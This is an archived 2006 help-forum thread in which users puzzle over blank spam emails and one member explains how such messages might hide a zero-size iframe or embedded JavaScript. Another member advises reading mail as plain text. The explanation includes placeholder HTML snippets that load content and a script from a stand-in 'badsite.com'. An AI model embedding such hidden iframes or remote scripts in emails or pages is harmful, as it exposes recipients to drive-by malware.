PDA

View Full Version : MT e-mails

Whenu
19-06-2006, 10:23 PM
yello, lately i have been getting e-mails with no subject, sender or content, anyone have the same happen to them? cheers

FoxyMX
19-06-2006, 10:41 PM
Yes, occasionally. Just delete them.

Laura
20-06-2006, 12:10 AM
Aha,
Snap, Whenu.

Have had 3 per day exactly like that on Saturday, Sunday & today... and been wondering how someone can make money out of spam which doesn't advertise anything?

Xtra's filter must be playing it safe, in case we all have absent-minded friends?
Or maybe this is a novice spammer who's still learning...

Erayd
20-06-2006, 12:22 AM
Unless it's something malicious like a 0px iframe to a bad site embedded in the email's HTML. Or embedded javascript.

Laura
20-06-2006, 12:30 AM
Translation please, Bletch.

Do you mean those could be in what appears as a totally blank email?

Erayd
20-06-2006, 12:36 AM
Yes. You can embed stuff in the following manner in the body of an HTML email:

IFrame:
<iframe style="width: 0px; height: 0px;" src="http://badsite.com" />

Javascript method A:
<script language="javascript">
doBadStuff();
function doBadStuff() {
killpc();
}
</script>

Javascript Method B:
<script language="javascript" src="http://badsite.com/script.js"></script>
Of course 'badsite.com' could put any content inside that iframe, including scripting, and you would see nothing.

Laura
20-06-2006, 12:53 AM
Hmmm.
That's a really sneaky one - or 2 - all right.

Apart from the first one, which I opened out of curiosity, I'm deleting them.
But I'd hope my avast! anti-virus would've yelled loudly - as it can- if there were nasties inside... or Xtra's filter jammed them by now.

Thanks for the info.
I suspect there are many others besides Whenu & me who'll find it relevant.

FoxyMX
20-06-2006, 10:47 AM
Unless it's something malicious like a 0px iframe to a bad site embedded in the email's HTML. Or embedded javascript.
And that is one very good reason for not having viewing in HTML enabled. They can't do their nasty business when emails are viewed in text mode only.

Robin S_
20-06-2006, 12:23 PM
My wife received several of these emails over the weekend (unfortunately her address is on a spamming list). She has an Orcon webmail address so out of curiosity I looked at the entries in her webmail inbox and they all had a line (which was presumably a link - I didn't touch it) in the message area saying something like 'Download the original message'.